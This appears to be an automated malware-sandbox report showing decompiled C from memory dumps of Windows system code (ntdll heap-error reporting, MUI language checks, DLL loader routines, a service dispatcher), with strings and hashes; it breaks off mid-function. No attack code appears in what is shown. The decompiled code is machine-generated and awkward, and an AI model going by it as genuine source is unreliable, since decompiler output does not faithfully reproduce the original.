                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                            • API String ID: 0-108210295
                            • Opcode ID: dc95d1ad61f4faf13d5dea10e470b5a23c7f554ab5a213f05d20c642a1f7921c
                            • Instruction ID: b56444901093e60b177c3244a145c7bf1bf1cc1d5c92c26d7e8375f5150147bb
                            • Opcode Fuzzy Hash: dc95d1ad61f4faf13d5dea10e470b5a23c7f554ab5a213f05d20c642a1f7921c
                            • Instruction Fuzzy Hash: AA814335A40204FFDF35AA4EEC85E7BBF3AEF56A5AF014088F5042B156D2658801DBB2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E013A1C06() {
                            				signed int _t27;
                            				char* _t104;
                            				char* _t105;
                            				intOrPtr _t113;
                            				intOrPtr _t115;
                            				intOrPtr _t117;
                            				intOrPtr _t119;
                            				intOrPtr _t120;
                            
                            				_t105 = 0x12c48a4;
                            				_t104 = "HEAP: ";
                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            					_push(_t104);
                            					E012EB150();
                            				} else {
                            					E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            				}
                            				_push( *0x13d589c);
                            				E012EB150("Heap error detected at %p (heap handle %p)\n",  *0x13d58a0);
                            				_t27 =  *0x13d5898; // 0x0
                            				if(_t27 <= 0xf) {
                            					switch( *((intOrPtr*)(_t27 * 4 +  &M013A1E96))) {
                            						case 0:
                            							_t105 = "heap_failure_internal";
                            							goto L21;
                            						case 1:
                            							goto L21;
                            						case 2:
                            							goto L21;
                            						case 3:
                            							goto L21;
                            						case 4:
                            							goto L21;
                            						case 5:
                            							goto L21;
                            						case 6:
                            							goto L21;
                            						case 7:
                            							goto L21;
                            						case 8:
                            							goto L21;
                            						case 9:
                            							goto L21;
                            						case 0xa:
                            							goto L21;
                            						case 0xb:
                            							goto L21;
                            						case 0xc:
                            							goto L21;
                            						case 0xd:
                            							goto L21;
                            						case 0xe:
                            							goto L21;
                            						case 0xf:
                            							goto L21;
                            					}
                            				}
                            				L21:
                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            					_push(_t104);
                            					E012EB150();
                            				} else {
                            					E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            				}
                            				_push(_t105);
                            				E012EB150("Error code: %d - %s\n",  *0x13d5898);
                            				_t113 =  *0x13d58a4; // 0x0
                            				if(_t113 != 0) {
                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            						_push(_t104);
                            						E012EB150();
                            					} else {
                            						E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            					}
                            					E012EB150("Parameter1: %p\n",  *0x13d58a4);
                            				}
                            				_t115 =  *0x13d58a8; // 0x0
                            				if(_t115 != 0) {
                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            						_push(_t104);
                            						E012EB150();
                            					} else {
                            						E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            					}
                            					E012EB150("Parameter2: %p\n",  *0x13d58a8);
                            				}
                            				_t117 =  *0x13d58ac; // 0x0
                            				if(_t117 != 0) {
                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            						_push(_t104);
                            						E012EB150();
                            					} else {
                            						E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            					}
                            					E012EB150("Parameter3: %p\n",  *0x13d58ac);
                            				}
                            				_t119 =  *0x13d58b0; // 0x0
                            				if(_t119 != 0) {
                            					L41:
                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            						_push(_t104);
                            						E012EB150();
                            					} else {
                            						E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            					}
                            					_push( *0x13d58b4);
                            					E012EB150("Last known valid blocks: before - %p, after - %p\n",  *0x13d58b0);
                            				} else {
                            					_t120 =  *0x13d58b4; // 0x0
                            					if(_t120 != 0) {
                            						goto L41;
                            					}
                            				}
                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            					_push(_t104);
                            					E012EB150();
                            				} else {
                            					E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            				}
                            				return E012EB150("Stack trace available at %p\n", 0x13d58c0);
                            			}












                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                            • API String ID: 0-2897834094
                            • Opcode ID: 7636a0db9a0d1a8b1d3585cf140ef18956ca38a13176aa211d9934ff99c34470
                            • Instruction ID: 6aa05fe94b246dbc7bf29d893c6ba0468a70bdae5361477f34ed36cc8a6ec3af
                            • Opcode Fuzzy Hash: 7636a0db9a0d1a8b1d3585cf140ef18956ca38a13176aa211d9934ff99c34470
                            • Instruction Fuzzy Hash: E461C33363214ADFD721AB89E489E3477F8EB04A74F8A806EF50E5F701D624D8408B5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E008B1450(WCHAR* _a4) {
                            				WCHAR* _v8;
                            				signed int _v12;
                            				void* _v16;
                            				int _v20;
                            				long _t65;
                            
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v8 = _a4;
                            				while(( *_v8 & 0x0000ffff) != 0) {
                            					_v12 = _v12 + 1;
                            					_v8 =  &(_v8[lstrlenW(_v8)]);
                            					_v8 =  &(_v8[1]);
                            				}
                            				_v16 = HeapAlloc(GetProcessHeap(), 0, 8 + _v12 * 8);
                            				_v12 = 0;
                            				_v8 = _a4;
                            				while(( *_v8 & 0x0000ffff) != 0) {
                            					if(E008B1160(_v8, _v16 + _v12 * 8) != 0) {
                            						_v12 = _v12 + 1;
                            						_v8 =  &(_v8[lstrlenW(_v8)]);
                            						_v8 =  &(_v8[1]);
                            						continue;
                            					}
                            					HeapFree(GetProcessHeap(), 0, _v16);
                            					return 0;
                            				}
                            				 *(_v16 + _v12 * 8) = 0;
                            				 *(_v16 + 4 + _v12 * 8) = 0;
                            				_v20 = StartServiceCtrlDispatcherW(_v16);
                            				if(_v20 == 0) {
                            					_t65 = GetLastError();
                            					0x8b0000(_a4, _t65);
                            					0x8b0000("StartServiceCtrlDispatcherW failed to start %s: %u\n", _t65);
                            				}
                            				HeapFree(GetProcessHeap(), 0, _v16);
                            				return _v20;
                            			}

                            APIs
                            • lstrlenW.KERNEL32(00000000), ref: 008B1488
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B14AF
                            • HeapAlloc.KERNEL32(00000000), ref: 008B14B6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B14F3
                            • HeapFree.KERNEL32(00000000), ref: 008B14FA
                            • lstrlenW.KERNEL32(00000000), ref: 008B1514
                            • StartServiceCtrlDispatcherW.ADVAPI32(00000000), ref: 008B154D
                            • GetLastError.KERNEL32 ref: 008B155C
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B157D
                            • HeapFree.KERNEL32(00000000), ref: 008B1584
                            Strings
                            • StartServiceCtrlDispatcherW failed to start %s: %u, xrefs: 008B156D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$Process$Freelstrlen$AllocCtrlDispatcherErrorLastServiceStart
                            • String ID: StartServiceCtrlDispatcherW failed to start %s: %u
                            • API String ID: 3118973391-2801566792
                            • Opcode ID: 5a57d0d45a630cbfcc9f9191d20d147928e6ae7f53b237613fb9037af871496e
                            • Instruction ID: 38355a1cc0cb3c84be2ea40f97b75c5f36500dbf53a1c74c6a0ba59b9a63592f
                            • Opcode Fuzzy Hash: 5a57d0d45a630cbfcc9f9191d20d147928e6ae7f53b237613fb9037af871496e
                            • Instruction Fuzzy Hash: 9341C8B4D00209FFDB14EFA4C958BAEBBB5FF48305F208199E545AB350D7359A41DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E012F3D34(signed int* __ecx) {
                            				signed int* _v8;
                            				char _v12;
                            				signed int* _v16;
                            				signed int* _v20;
                            				char _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				char _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				signed int* _v48;
                            				signed int* _v52;
                            				signed int _v56;
                            				signed int _v60;
                            				char _v68;
                            				signed int _t140;
                            				signed int _t161;
                            				signed int* _t236;
                            				signed int* _t242;
                            				signed int* _t243;
                            				signed int* _t244;
                            				signed int* _t245;
                            				signed int _t255;
                            				void* _t257;
                            				signed int _t260;
                            				void* _t262;
                            				signed int _t264;
                            				void* _t267;
                            				signed int _t275;
                            				signed int* _t276;
                            				short* _t277;
                            				signed int* _t278;
                            				signed int* _t279;
                            				signed int* _t280;
                            				short* _t281;
                            				signed int* _t282;
                            				short* _t283;
                            				signed int* _t284;
                            				void* _t285;
                            
                            				_v60 = _v60 | 0xffffffff;
                            				_t280 = 0;
                            				_t242 = __ecx;
                            				_v52 = __ecx;
                            				_v8 = 0;
                            				_v20 = 0;
                            				_v40 = 0;
                            				_v28 = 0;
                            				_v32 = 0;
                            				_v44 = 0;
                            				_v56 = 0;
                            				_t275 = 0;
                            				_v16 = 0;
                            				if(__ecx == 0) {
                            					_t280 = 0xc000000d;
                            					_t140 = 0;
                            					L50:
                            					 *_t242 =  *_t242 | 0x00000800;
                            					_t242[0x13] = _t140;
                            					_t242[0x16] = _v40;
                            					_t242[0x18] = _v28;
                            					_t242[0x14] = _v32;
                            					_t242[0x17] = _t275;
                            					_t242[0x15] = _v44;
                            					_t242[0x11] = _v56;
                            					_t242[0x12] = _v60;
                            					return _t280;
                            				}
                            				if(E012F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                            					_v56 = 1;
                            					if(_v8 != 0) {
                            						L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                            					}
                            					_v8 = _t280;
                            				}
                            				if(E012F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                            					_v60 =  *_v8;
                            					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                            					_v8 = _t280;
                            				}
                            				if(E012F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                            					L16:
                            					if(E012F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                            						L28:
                            						if(E012F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                            							L46:
                            							_t275 = _v16;
                            							L47:
                            							_t161 = 0;
                            							L48:
                            							if(_v8 != 0) {
                            								L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                            							}
                            							_t140 = _v20;
                            							if(_t140 != 0) {
                            								if(_t275 != 0) {
                            									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                            									_t275 = 0;
                            									_v28 = 0;
                            									_t140 = _v20;
                            								}
                            							}
                            							goto L50;
                            						}
                            						_t167 = _v12;
                            						_t255 = _v12 + 4;
                            						_v44 = _t255;
                            						if(_t255 == 0) {
                            							_t276 = _t280;
                            							_v32 = _t280;
                            						} else {
                            							_t276 = L01304620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                            							_t167 = _v12;
                            							_v32 = _t276;
                            						}
                            						if(_t276 == 0) {
                            							_v44 = _t280;
                            							_t280 = 0xc0000017;
                            							goto L46;
                            						} else {
                            							E0132F3E0(_t276, _v8, _t167);
                            							_v48 = _t276;
                            							_t277 = E01331370(_t276, 0x12c4e90);
                            							_pop(_t257);
                            							if(_t277 == 0) {
                            								L38:
                            								_t170 = _v48;
                            								if( *_v48 != 0) {
                            									E0132BB40(0,  &_v68, _t170);
                            									if(L012F43C0( &_v68,  &_v24) != 0) {
                            										_t280 =  &(_t280[0]);
                            									}
                            								}
                            								if(_t280 == 0) {
                            									_t280 = 0;
                            									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                            									_v44 = 0;
                            									_v32 = 0;
                            								} else {
                            									_t280 = 0;
                            								}
                            								_t174 = _v8;
                            								if(_v8 != 0) {
                            									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                            								}
                            								_v8 = _t280;
                            								goto L46;
                            							}
                            							_t243 = _v48;
                            							do {
                            								 *_t277 = 0;
                            								_t278 = _t277 + 2;
                            								E0132BB40(_t257,  &_v68, _t243);
                            								if(L012F43C0( &_v68,  &_v24) != 0) {
                            									_t280 =  &(_t280[0]);
                            								}
                            								_t243 = _t278;
                            								_t277 = E01331370(_t278, 0x12c4e90);
                            								_pop(_t257);
                            							} while (_t277 != 0);
                            							_v48 = _t243;
                            							_t242 = _v52;
                            							goto L38;
                            						}
                            					}
                            					_t191 = _v12;
                            					_t260 = _v12 + 4;
                            					_v28 = _t260;
                            					if(_t260 == 0) {
                            						_t275 = _t280;
                            						_v16 = _t280;
                            					} else {
                            						_t275 = L01304620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                            						_t191 = _v12;
                            						_v16 = _t275;
                            					}
                            					if(_t275 == 0) {
                            						_v28 = _t280;
                            						_t280 = 0xc0000017;
                            						goto L47;
                            					} else {
                            						E0132F3E0(_t275, _v8, _t191);
                            						_t285 = _t285 + 0xc;
                            						_v48 = _t275;
                            						_t279 = _t280;
                            						_t281 = E01331370(_v16, 0x12c4e90);
                            						_pop(_t262);
                            						if(_t281 != 0) {
                            							_t244 = _v48;
                            							do {
                            								 *_t281 = 0;
                            								_t282 = _t281 + 2;
                            								E0132BB40(_t262,  &_v68, _t244);
                            								if(L012F43C0( &_v68,  &_v24) != 0) {
                            									_t279 =  &(_t279[0]);
                            								}
                            								_t244 = _t282;
                            								_t281 = E01331370(_t282, 0x12c4e90);
                            								_pop(_t262);
                            							} while (_t281 != 0);
                            							_v48 = _t244;
                            							_t242 = _v52;
                            						}
                            						_t201 = _v48;
                            						_t280 = 0;
                            						if( *_v48 != 0) {
                            							E0132BB40(_t262,  &_v68, _t201);
                            							if(L012F43C0( &_v68,  &_v24) != 0) {
                            								_t279 =  &(_t279[0]);
                            							}
                            						}
                            						if(_t279 == 0) {
                            							L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                            							_v28 = _t280;
                            							_v16 = _t280;
                            						}
                            						_t202 = _v8;
                            						if(_v8 != 0) {
                            							L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                            						}
                            						_v8 = _t280;
                            						goto L28;
                            					}
                            				}
                            				_t214 = _v12;
                            				_t264 = _v12 + 4;
                            				_v40 = _t264;
                            				if(_t264 == 0) {
                            					_v20 = _t280;
                            				} else {
                            					_t236 = L01304620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                            					_t280 = _t236;
                            					_v20 = _t236;
                            					_t214 = _v12;
                            				}
                            				if(_t280 == 0) {
                            					_t161 = 0;
                            					_t280 = 0xc0000017;
                            					_v40 = 0;
                            					goto L48;
                            				} else {
                            					E0132F3E0(_t280, _v8, _t214);
                            					_t285 = _t285 + 0xc;
                            					_v48 = _t280;
                            					_t283 = E01331370(_t280, 0x12c4e90);
                            					_pop(_t267);
                            					if(_t283 != 0) {
                            						_t245 = _v48;
                            						do {
                            							 *_t283 = 0;
                            							_t284 = _t283 + 2;
                            							E0132BB40(_t267,  &_v68, _t245);
                            							if(L012F43C0( &_v68,  &_v24) != 0) {
                            								_t275 = _t275 + 1;
                            							}
                            							_t245 = _t284;
                            							_t283 = E01331370(_t284, 0x12c4e90);
                            							_pop(_t267);
                            						} while (_t283 != 0);
                            						_v48 = _t245;
                            						_t242 = _v52;
                            					}
                            					_t224 = _v48;
                            					_t280 = 0;
                            					if( *_v48 != 0) {
                            						E0132BB40(_t267,  &_v68, _t224);
                            						if(L012F43C0( &_v68,  &_v24) != 0) {
                            							_t275 = _t275 + 1;
                            						}
                            					}
                            					if(_t275 == 0) {
                            						L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                            						_v40 = _t280;
                            						_v20 = _t280;
                            					}
                            					_t225 = _v8;
                            					if(_v8 != 0) {
                            						L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                            					}
                            					_v8 = _t280;
                            					goto L16;
                            				}
                            			}

                            Strings
                            • Kernel-MUI-Language-Allowed, xrefs: 012F3DC0
                            • Kernel-MUI-Language-SKU, xrefs: 012F3F70
                            • Kernel-MUI-Language-Disallowed, xrefs: 012F3E97
                            • Kernel-MUI-Number-Allowed, xrefs: 012F3D8C
                            • WindowsExcludedProcs, xrefs: 012F3D6F
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                            • API String ID: 0-258546922
                            • Opcode ID: 90ed2511a58647d842f65387c5fc425bcabedf4744d96ecc30bf5869e8013397
                            • Instruction ID: c856eeb4743ce93a53e88234f7c8c5864e06e36c929c68bcd889b9a64bd52058
                            • Opcode Fuzzy Hash: 90ed2511a58647d842f65387c5fc425bcabedf4744d96ecc30bf5869e8013397
                            • Instruction Fuzzy Hash: 8AF15E72D10259EBCB15DF98C9409EFFBF9FF18A54F14016AE605A7250D770AE01CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E01318E00(void* __ecx) {
                            				signed int _v8;
                            				char _v12;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr* _t32;
                            				intOrPtr _t35;
                            				intOrPtr _t43;
                            				void* _t46;
                            				intOrPtr _t47;
                            				void* _t48;
                            				signed int _t49;
                            				void* _t50;
                            				intOrPtr* _t51;
                            				signed int _t52;
                            				void* _t53;
                            				intOrPtr _t55;
                            
                            				_v8 =  *0x13dd360 ^ _t52;
                            				_t49 = 0;
                            				_t48 = __ecx;
                            				_t55 =  *0x13d8464; // 0x75150110
                            				if(_t55 == 0) {
                            					L9:
                            					if( !_t49 >= 0) {
                            						if(( *0x13d5780 & 0x00000003) != 0) {
                            							E01365510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                            						}
                            						if(( *0x13d5780 & 0x00000010) != 0) {
                            							asm("int3");
                            						}
                            					}
                            					return E0132B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                            				}
                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                            				_t43 =  *0x13d7984; // 0xdb2b60
                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                            					if(_t48 == _t43) {
                            						_t50 = 0x5c;
                            						if( *_t32 == _t50) {
                            							_t46 = 0x3f;
                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                            								_t32 = _t32 + 8;
                            							}
                            						}
                            					}
                            					_t51 =  *0x13d8464; // 0x75150110
                            					 *0x13db1e0(_t47, _t32,  &_v12);
                            					_t49 =  *_t51();
                            					if(_t49 >= 0) {
                            						L8:
                            						_t35 = _v12;
                            						if(_t35 != 0) {
                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                            								E01319B10( *((intOrPtr*)(_t48 + 0x48)));
                            								_t35 = _v12;
                            							}
                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                            						}
                            						goto L9;
                            					}
                            					if(_t49 != 0xc000008a) {
                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                            							if(_t49 != 0xc00000bb) {
                            								goto L8;
                            							}
                            						}
                            					}
                            					if(( *0x13d5780 & 0x00000005) != 0) {
                            						_push(_t49);
                            						E01365510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                            						_t53 = _t53 + 0x1c;
                            					}
                            					_t49 = 0;
                            					goto L8;
                            				} else {
                            					goto L9;
                            				}
                            			}





















                            Strings
                            • Querying the active activation context failed with status 0x%08lx, xrefs: 01359357
                            • minkernel\ntdll\ldrsnap.c, xrefs: 0135933B, 01359367
                            • LdrpFindDllActivationContext, xrefs: 01359331, 0135935D
                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0135932A
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                            • API String ID: 0-3779518884
                            • Opcode ID: e5c56c4aec8757057d6ce6ab9f40c49aebc91231be7b218433717feef301da5f
                            • Instruction ID: 2951359176d84a6910cf134faf52e928bca5aa8877c95f757fd28966522d02eb
                            • Opcode Fuzzy Hash: e5c56c4aec8757057d6ce6ab9f40c49aebc91231be7b218433717feef301da5f
                            • Instruction Fuzzy Hash: 3C412A32A00315DFDF3DAA1C9849B76BBB8AB0174CF0641EDEA0C97559E7705C8083E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E012F8794(void* __ecx) {
                            				signed int _v0;
                            				char _v8;
                            				signed int _v12;
                            				void* _v16;
                            				signed int _v20;
                            				intOrPtr _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v40;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr* _t77;
                            				signed int _t80;
                            				signed char _t81;
                            				signed int _t87;
                            				signed int _t91;
                            				void* _t92;
                            				void* _t94;
                            				signed int _t95;
                            				signed int _t103;
                            				signed int _t105;
                            				signed int _t110;
                            				signed int _t118;
                            				intOrPtr* _t121;
                            				intOrPtr _t122;
                            				signed int _t125;
                            				signed int _t129;
                            				signed int _t131;
                            				signed int _t134;
                            				signed int _t136;
                            				signed int _t143;
                            				signed int* _t147;
                            				signed int _t151;
                            				void* _t153;
                            				signed int* _t157;
                            				signed int _t159;
                            				signed int _t161;
                            				signed int _t166;
                            				signed int _t168;
                            
                            				_push(__ecx);
                            				_t153 = __ecx;
                            				_t159 = 0;
                            				_t121 = __ecx + 0x3c;
                            				if( *_t121 == 0) {
                            					L2:
                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                            							L6:
                            							if(E012F934A() != 0) {
                            								_t159 = E0136A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                            								__eflags = _t159;
                            								if(_t159 < 0) {
                            									_t81 =  *0x13d5780; // 0x0
                            									__eflags = _t81 & 0x00000003;
                            									if((_t81 & 0x00000003) != 0) {
                            										_push(_t159);
                            										E01365510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                            										_t81 =  *0x13d5780; // 0x0
                            									}
                            									__eflags = _t81 & 0x00000010;
                            									if((_t81 & 0x00000010) != 0) {
                            										asm("int3");
                            									}
                            								}
                            							}
                            						} else {
                            							_t159 = E012F849B(0, _t122, _t153, _t159, _t180);
                            							if(_t159 >= 0) {
                            								goto L6;
                            							}
                            						}
                            						_t80 = _t159;
                            						goto L8;
                            					} else {
                            						_t125 = 0x13;
                            						asm("int 0x29");
                            						_push(0);
                            						_push(_t159);
                            						_t161 = _t125;
                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                            						_t143 = 0;
                            						_v40 = _t161;
                            						_t118 = 0;
                            						_push(_t153);
                            						__eflags = _t87;
                            						if(_t87 != 0) {
                            							_t118 = _t87 + 0x5d8;
                            							__eflags = _t118;
                            							if(_t118 == 0) {
                            								L46:
                            								_t118 = 0;
                            							} else {
                            								__eflags =  *(_t118 + 0x30);
                            								if( *(_t118 + 0x30) == 0) {
                            									goto L46;
                            								}
                            							}
                            						}
                            						_v32 = 0;
                            						_v28 = 0;
                            						_v16 = 0;
                            						_v20 = 0;
                            						_v12 = 0;
                            						__eflags = _t118;
                            						if(_t118 != 0) {
                            							__eflags = _t161;
                            							if(_t161 != 0) {
                            								__eflags =  *(_t118 + 8);
                            								if( *(_t118 + 8) == 0) {
                            									L22:
                            									_t143 = 1;
                            									__eflags = 1;
                            								} else {
                            									_t19 = _t118 + 0x40; // 0x40
                            									_t156 = _t19;
                            									E012F8999(_t19,  &_v16);
                            									__eflags = _v0;
                            									if(_v0 != 0) {
                            										__eflags = _v0 - 1;
                            										if(_v0 != 1) {
                            											goto L22;
                            										} else {
                            											_t128 =  *(_t161 + 0x64);
                            											__eflags =  *(_t161 + 0x64);
                            											if( *(_t161 + 0x64) == 0) {
                            												goto L22;
                            											} else {
                            												E012F8999(_t128,  &_v12);
                            												_t147 = _v12;
                            												_t91 = 0;
                            												__eflags = 0;
                            												_t129 =  *_t147;
                            												while(1) {
                            													__eflags =  *((intOrPtr*)(0x13d5c60 + _t91 * 8)) - _t129;
                            													if( *((intOrPtr*)(0x13d5c60 + _t91 * 8)) == _t129) {
                            														break;
                            													}
                            													_t91 = _t91 + 1;
                            													__eflags = _t91 - 5;
                            													if(_t91 < 5) {
                            														continue;
                            													} else {
                            														_t131 = 0;
                            														__eflags = 0;
                            													}
                            													L37:
                            													__eflags = _t131;
                            													if(_t131 != 0) {
                            														goto L22;
                            													} else {
                            														__eflags = _v16 - _t147;
                            														if(_v16 != _t147) {
                            															goto L22;
                            														} else {
                            															E01302280(_t92, 0x13d86cc);
                            															_t94 = E013B9DFB( &_v20);
                            															__eflags = _t94 - 1;
                            															if(_t94 != 1) {
                            															}
                            															asm("movsd");
                            															asm("movsd");
